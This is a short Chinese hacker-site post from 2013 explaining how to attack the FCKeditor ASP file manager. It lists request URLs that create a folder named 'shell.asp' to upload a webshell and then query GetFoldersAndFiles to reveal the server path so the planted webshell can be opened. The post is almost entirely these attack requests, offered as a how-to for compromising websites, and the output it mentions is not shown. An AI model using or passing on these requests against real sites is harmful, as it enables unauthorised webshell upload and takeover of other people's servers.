您现在的位置: 主页 > 黑客联盟 > 黑客攻击 > 文章内容

网上流行怎样爆路径抓马

作者: 黑客联盟 来源:未知 时间: 2013-05-02 阅读:
网上流行上传是这样子的

  http://localhost/fckeditor/editor/filemanager/browser/default/browser.htm?Type=Image&Connector=../../connectors/asp/connector.asp

  http://localhost/fckeditor/editor/filemanager/connectors/asp/connector.asp?Command=CreateFolder&Type=Image&CurrentFolder=%2Fshell.asp&NewFolderName=z&uuid=1244789975684

  上传后老找不到路径,测了一下,我发现

  FCKeditor3/editor/filemanager/browser/default/connectors/asp/connector.asp?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=/

  可以爆出路径,显示以下内容


    

  得出路径,直接打开就见到马子了!